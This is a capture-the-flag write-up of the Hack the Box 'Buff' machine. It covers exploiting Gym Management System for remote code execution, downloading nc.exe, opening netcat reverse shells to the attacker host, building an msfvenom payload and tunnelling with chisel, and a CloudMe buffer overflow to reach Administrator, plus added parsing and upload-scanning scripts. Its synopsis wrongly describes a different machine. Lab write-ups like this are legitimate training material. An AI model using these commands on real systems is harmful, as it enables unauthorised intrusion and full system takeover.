DEV Community

ikkyu

【Hack the Box】Buff - Walkthrough

From the HackTheBox machine page:

Synopsis: Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.

Enumeration

# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.198:8080/
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/facilities.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/packages.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/about.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/contact.php
|     Form id: 
|     Form action: include/process_login.php
|     
|     Path: http://10.10.10.198:8080/index.php
|     Form id: 
|_    Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-1999-1412   10.0    https://vulners.com/cve/CVE-1999-1412
|       CVE-1999-1237   10.0    https://vulners.com/cve/CVE-1999-1237
|       CVE-1999-0236   10.0    https://vulners.com/cve/CVE-1999-0236
|       CVE-2009-1955   7.8 https://vulners.com/cve/CVE-2009-1955
|       CVE-2007-6423   7.8 https://vulners.com/cve/CVE-2007-6423
|       CVE-2007-0086   7.8 https://vulners.com/cve/CVE-2007-0086
|       CVE-2020-11984  7.5 https://vulners.com/cve/CVE-2020-11984
|       CVE-2009-3095   7.5 https://vulners.com/cve/CVE-2009-3095
|       CVE-2007-4723   7.5 https://vulners.com/cve/CVE-2007-4723
|       CVE-2009-1891   7.1 https://vulners.com/cve/CVE-2009-1891
|       CVE-2009-1890   7.1 https://vulners.com/cve/CVE-2009-1890
|       CVE-2008-2579   6.8 https://vulners.com/cve/CVE-2008-2579
|       CVE-2007-5156   6.8 https://vulners.com/cve/CVE-2007-5156
|       CVE-2020-9490   5.0 https://vulners.com/cve/CVE-2020-9490
|       CVE-2014-0231   5.0 https://vulners.com/cve/CVE-2014-0231
|       CVE-2011-1752   5.0 https://vulners.com/cve/CVE-2011-1752
|       CVE-2010-1452   5.0 https://vulners.com/cve/CVE-2010-1452
|       CVE-2010-0408   5.0 https://vulners.com/cve/CVE-2010-0408
|       CVE-2009-2699   5.0 https://vulners.com/cve/CVE-2009-2699
|       CVE-2007-0450   5.0 https://vulners.com/cve/CVE-2007-0450
|       CVE-2005-1268   5.0 https://vulners.com/cve/CVE-2005-1268
|       CVE-2003-0020   5.0 https://vulners.com/cve/CVE-2003-0020
|       CVE-2001-1556   5.0 https://vulners.com/cve/CVE-2001-1556
|       CVE-1999-0678   5.0 https://vulners.com/cve/CVE-1999-0678
|       CVE-1999-0289   5.0 https://vulners.com/cve/CVE-1999-0289
|       CVE-1999-0070   5.0 https://vulners.com/cve/CVE-1999-0070
|       CVE-2009-1195   4.9 https://vulners.com/cve/CVE-2009-1195
|       CVE-2020-11993  4.3 https://vulners.com/cve/CVE-2020-11993
|       CVE-2011-1783   4.3 https://vulners.com/cve/CVE-2011-1783
|       CVE-2010-0434   4.3 https://vulners.com/cve/CVE-2010-0434
|       CVE-2008-2939   4.3 https://vulners.com/cve/CVE-2008-2939
|       CVE-2008-2168   4.3 https://vulners.com/cve/CVE-2008-2168
|       CVE-2008-0455   4.3 https://vulners.com/cve/CVE-2008-0455
|       CVE-2007-6420   4.3 https://vulners.com/cve/CVE-2007-6420
|       CVE-2007-6388   4.3 https://vulners.com/cve/CVE-2007-6388
|       CVE-2007-5000   4.3 https://vulners.com/cve/CVE-2007-5000
|       CVE-2007-4465   4.3 https://vulners.com/cve/CVE-2007-4465
|       CVE-2007-1349   4.3 https://vulners.com/cve/CVE-2007-1349
|       CVE-2007-6422   4.0 https://vulners.com/cve/CVE-2007-6422
|       CVE-2007-6421   3.5 https://vulners.com/cve/CVE-2007-6421
|_      CVE-2001-0131   1.2 https://vulners.com/cve/CVE-2001-0131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds

I found that port 8080 is open.
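To turn a scan like the one above into a short triage list, here is an added Python example (not part of the original post) that parses nmap's normal output for open ports, the vulners CVE/CVSS rows, and the CVE ids of NSE checks that reported a VULNERABLE state, then filters by score. The excerpt it embeds is a constructed subset of the scan above; note that vulners matches on the version string alone, which is why 1999-era CVEs show up against httpd 2.4.43, so its rows are leads rather than confirmed findings.

```python
import re
from dataclasses import dataclass

# Constructed subset of the nmap output shown above.
NMAP_EXCERPT = """\
Nmap scan report for 10.10.10.198
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|_http-trace: TRACE is enabled
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-2020-11984  7.5 https://vulners.com/cve/CVE-2020-11984
|       CVE-2009-1891   7.1 https://vulners.com/cve/CVE-2009-1891
|       CVE-2020-9490   5.0 https://vulners.com/cve/CVE-2020-9490
|_      CVE-2001-0131   1.2 https://vulners.com/cve/CVE-2001-0131
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
CPE_RE = re.compile(r"^\|\s+(cpe:/\S+):\s*$")                       # vulners product header
VULNERS_RE = re.compile(r"^\|_?\s+(CVE-\d{4}-\d+)\s+(\d+(?:\.\d+)?)\s+(\S+)")  # id, CVSS, url
NSE_ID_RE = re.compile(r"^\|\s+IDs:\s+CVE:(CVE-\d{4}-\d+)")         # id line of an NSE check


@dataclass
class Finding:
    port: int
    proto: str
    source: str    # the vulners CPE the row came from, or "nse" for a script check
    cve: str
    score: float   # CVSS from vulners; 0.0 when the NSE script reports no score


def parse_nmap(text):
    """Parse nmap normal output into (open_ports, findings)."""
    ports, findings = [], []
    port = proto = cpe = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto = int(m.group(1)), m.group(2)
            ports.append((port, proto, m.group(3), m.group(4).strip()))
            cpe = None
            continue
        if port is None:          # host header lines: nothing to attribute yet
            continue
        if m := CPE_RE.match(line):
            cpe = m.group(1)
        elif (m := VULNERS_RE.match(line)) and cpe:
            findings.append(Finding(port, proto, cpe, m.group(1), float(m.group(2))))
        elif m := NSE_ID_RE.match(line):
            findings.append(Finding(port, proto, "nse", m.group(1), 0.0))
    return ports, findings


def triage(findings, min_score):
    """CVE ids at or above min_score, highest CVSS first, plus every NSE-reported id
    (those carry no score but are positive test results rather than version matches)."""
    keep = [f for f in findings if f.score >= min_score or f.source == "nse"]
    keep.sort(key=lambda f: (-f.score, f.cve))
    return [f.cve for f in keep]


if __name__ == "__main__":
    open_ports, found = parse_nmap(NMAP_EXCERPT)
    print(open_ports)
    print(triage(found, 7.5))
```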

[Screenshot: the web application on port 8080]

Local Privilege Escalation

I searched for gym in metasploit and found 48506.py.

$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                     | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I ran it:

$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> 
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun

Now I have a shell on the machine. Next we need to upload nc.exe to upgrade the shell.

On the local machine:

$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the target machine:

C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�
C:\xampp\htdocs\gym\upload> dir
�PNG
�
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\xampp\htdocs\gym\upload

22/12/2020  12:04    <DIR>          .
22/12/2020  12:04    <DIR>          ..
22/12/2020  12:04                53 kamehameha.php
22/12/2020  11:40            38,616 nc.exe
               2 File(s)         38,669 bytes
               2 Dir(s)   7,315,296,256 bytes free

The upload succeeded. Now we can get a reverse shell.

On the local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444

On the target machine:

C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe

On the local machine:

rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>

I got a reverse shell.
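The �PNG bytes printed before every command's output come from the uploaded webshell itself: the file starts with the PNG magic number so that an image-only upload filter accepts it, and the 53-byte kamehameha.php in the directory listing is that file. As an added example (not from the original post or the exploit), here is a Python check a defender can run over an upload directory to flag such image/PHP polyglots and stray scripts; the sample files it creates are constructed and their PHP body is a harmless echo.

```python
import tempfile
from pathlib import Path

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"           # what the "�PNG" prefix above decodes to
PHP_MARKERS = (b"<?php", b"<?=")            # PHP open tags
SCRIPT_SUFFIXES = {".php", ".phtml", ".php3", ".php5", ".phar"}


def classify_upload(path):
    """Labels for one file in an upload directory (empty list = nothing suspicious).

    script-extension : a server-side script stored where only images belong
    image-polyglot   : starts with the PNG magic number but carries PHP code, so it
                       passes a magic-number or MIME check yet still runs if the
                       web server executes PHP in this directory
    """
    labels = []
    data = path.read_bytes()
    if path.suffix.lower() in SCRIPT_SUFFIXES:
        labels.append("script-extension")
    if data.startswith(PNG_MAGIC) and any(tag in data for tag in PHP_MARKERS):
        labels.append("image-polyglot")
    return labels


def scan_upload_dir(directory):
    """Map file name -> labels for every flagged file directly under `directory`."""
    flagged = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            labels = classify_upload(path)
            if labels:
                flagged[path.name] = labels
    return flagged


def demo():
    """Build a constructed upload directory and scan it.

    The polyglot files mimic the layout seen above (PNG magic followed by PHP);
    their PHP body is a harmless echo written for this example.
    """
    php_body = b'<?php echo "constructed sample"; ?>'
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "logo.png").write_bytes(PNG_MAGIC + b"\x00" * 32)      # genuine-looking image
        (root / "notes.txt").write_bytes(b"plain text, nothing to see")
        (root / "kamehameha.php").write_bytes(PNG_MAGIC + php_body)    # .php AND polyglot
        (root / "avatar.png").write_bytes(PNG_MAGIC + php_body)        # polyglot hiding as .png
        return scan_upload_dir(root)


if __name__ == "__main__":
    for name, labels in demo().items():
        print(f"{name}: {', '.join(labels)}")
```

The durable fix is on the server side: store uploads outside the web root or disable script execution for the upload directory, and validate content rather than only the extension or magic number.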

Administrator Privilege Escalation

I checked the running processes.

C:\xampp\htdocs\gym\upload>tasklist
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         44 K
Registry                       104                            0      7,392 K
smss.exe                       368                            0        384 K
csrss.exe                      456                            0      3,856 K
wininit.exe                    532                            0      4,608 K
csrss.exe                      540                            1      3,452 K
winlogon.exe                   604                            1      8,888 K
services.exe                   676                            0      8,296 K
lsass.exe                      696                            0     12,072 K
svchost.exe                    812                            0      2,520 K
fontdrvhost.exe                836                            0     13,900 K
fontdrvhost.exe                844                            1      8,100 K
svchost.exe                    860                            0     22,724 K
svchost.exe                    956                            0     12,036 K
svchost.exe                   1004                            0      6,028 K
dwm.exe                        328                            1     41,676 K
svchost.exe                    360                            0      8,292 K
svchost.exe                    948                            0      7,100 K
svchost.exe                    996                            0      9,664 K
svchost.exe                   1076                            0     18,084 K
svchost.exe                   1136                            0     18,504 K
svchost.exe                   1208                            0      5,984 K
svchost.exe                   1280                            0      5,680 K
svchost.exe                   1380                            0      8,672 K
svchost.exe                   1388                            0     10,612 K
svchost.exe                   1408                            0      4,044 K
svchost.exe                   1416                            0      7,352 K
svchost.exe                   1516                            0      9,604 K
svchost.exe                   1552                            0     12,944 K
Memory Compression            1564                            0     30,132 K
svchost.exe                   1592                            0      7,004 K
svchost.exe                   1676                            0      6,028 K
svchost.exe                   1772                            0      5,036 K
svchost.exe                   1780                            0      5,792 K
svchost.exe                   1824                            0      6,956 K
svchost.exe                   1880                            0      8,588 K
svchost.exe                   1988                            0      6,180 K
svchost.exe                   1456                            0      6,364 K
svchost.exe                   1336                            0      7,044 K
svchost.exe                   1240                            0      4,432 K
svchost.exe                   2060                            0      7,564 K
svchost.exe                   2132                            0      9,108 K
svchost.exe                   2284                            0      5,600 K
spoolsv.exe                   2300                            0     12,040 K
svchost.exe                   2424                            0      6,124 K
svchost.exe                   2736                            0      7,660 K
svchost.exe                   2748                            0     14,036 K
svchost.exe                   2760                            0     19,308 K
svchost.exe                   2768                            0      3,696 K
svchost.exe                   2756                            0      4,532 K
vmtoolsd.exe                  2788                            0     18,696 K
svchost.exe                   2796                            0     13,656 K
svchost.exe                   2804                            0     15,532 K
SecurityHealthService.exe     2832                            0     13,048 K
MsMpEng.exe                   2864                            0    169,640 K
VGAuthService.exe             2880                            0      7,840 K
svchost.exe                   2980                            0      7,080 K
svchost.exe                   2052                            0      9,868 K
svchost.exe                   3104                            0      9,768 K
svchost.exe                   3144                            0      3,568 K
dllhost.exe                   3660                            0     11,308 K
WmiPrvSE.exe                  3848                            0     14,188 K
msdtc.exe                     2720                            0      8,132 K
svchost.exe                   4540                            0     30,464 K
sihost.exe                    4596                            1     21,576 K
svchost.exe                   4620                            1     11,716 K
svchost.exe                   4672                            1     24,212 K
taskhostw.exe                 4768                            1      9,896 K
svchost.exe                   4932                            0      5,548 K
ctfmon.exe                    4992                            1     10,796 K
svchost.exe                   5080                            0      5,848 K
svchost.exe                   5092                            0     11,500 K
NisSrv.exe                    5212                            0      7,268 K
WmiPrvSE.exe                  5276                            0     18,888 K
explorer.exe                  5716                            1     79,172 K
svchost.exe                   5776                            0     16,212 K
svchost.exe                   5796                            0     11,372 K
svchost.exe                   5960                            0      5,312 K
svchost.exe                   6000                            0     12,380 K
svchost.exe                   5444                            0      4,852 K
svchost.exe                   4416                            0      4,976 K
ShellExperienceHost.exe       1048                            1     51,772 K
SearchUI.exe                  6360                            1    118,800 K
RuntimeBroker.exe             6588                            1     16,452 K
ApplicationFrameHost.exe      6780                            1     26,996 K
MicrosoftEdge.exe             7072                            1     55,284 K
browser_broker.exe            7160                            1      6,876 K
svchost.exe                   6316                            0      4,668 K
Windows.WARP.JITService.e     4404                            0      3,380 K
RuntimeBroker.exe             4356                            1      5,012 K
MicrosoftEdgeCP.exe           4220                            1     18,920 K
RuntimeBroker.exe             4464                            1     13,908 K
MicrosoftEdgeCP.exe           2672                            1     21,300 K
svchost.exe                   7332                            0     11,264 K
conhost.exe                   7464                            0      1,008 K
SearchIndexer.exe             8140                            0     23,680 K
MSASCuiL.exe                  7424                            1      6,812 K
vmtoolsd.exe                  5748                            1     13,220 K
httpd.exe                     1712                            0        460 K
mysqld.exe                    7716                            0      3,480 K
svchost.exe                   2572                            0      3,636 K
svchost.exe                   5304                            1     14,224 K
httpd.exe                     1460                            0      9,188 K
svchost.exe                   6552                            0     12,824 K
SgrmBroker.exe                2296                            0      2,704 K
svchost.exe                   8248                            0      6,984 K
CompatTelRunner.exe           1104                            0        632 K
conhost.exe                   8608                            0      1,216 K
svchost.exe                   7788                            0      8,192 K
Microsoft.Photos.exe          2528                            1      5,240 K
RuntimeBroker.exe             3856                            1     12,252 K
WinStore.App.exe              8424                            1     26,440 K
RuntimeBroker.exe             4556                            1      5,240 K
SystemSettings.exe            7764                            1     32,228 K
svchost.exe                   5984                            0      4,748 K
svchost.exe                   7484                            0      9,652 K
taskhostw.exe                 5920                            1     20,872 K
taskhostw.exe                 3520                            0     23,440 K
CompatTelRunner.exe           1548                            0      2,428 K
conhost.exe                   8792                            0      9,736 K
TrustedInstaller.exe          1016                            0      5,524 K
svchost.exe                    196                            0      5,352 K
TiWorker.exe                  2148                            0    103,996 K
svchost.exe                   8784                            0      7,844 K
svchost.exe                   6488                            0      3,792 K
svchost.exe                   8596                            0     11,860 K
cmd.exe                       7204                            0      2,432 K
conhost.exe                   9176                            0      9,132 K
nc.exe                        7192                            0      5,436 K
cmd.exe                       4504                            0      3,988 K
cmd.exe                        708                            0      3,208 K
conhost.exe                   2452                            0     10,868 K
CloudMe.exe                   3496                            0     26,884 K
timeout.exe                   5968                            0      3,920 K
tasklist.exe                  8796                            0      7,772 K

I found CloudMe.exe. CloudMe is known to be vulnerable, so I searched for cloudme in metasploit.

$ searchsploit cloudme

--------------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
--------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results

I found 48389.py and looked it up on exploit-db.

[Screenshot: the exploit-db entry for 48389.py]

Now we need to modify this code a bit and set up remote port forwarding from the target machine. You can see on exploit-db that the exploit's default payload launches the calculator.

I created a payload with msfvenom that runs the nc.exe we uploaded. Here, the port is set to 4445, but it can be anything.

$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes

Replace the payload part of 48389.py with this output.
Next, we need to upload chisel.exe the same way as nc.exe and set up remote port forwarding, so that the exploit can reach CloudMe's port 8888 on the target's loopback interface from our machine. After uploading, on the local machine:

$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234

On the target machine:

C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected

Now start a netcat listener on 4445 and run the modified 48389.py in a second terminal.

$ nc -lnvp 4445
Listening on 0.0.0.0 4445

Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

We got Administrator.

Discussion (1)

marcellothearcane

Ouch! How do you mitigate?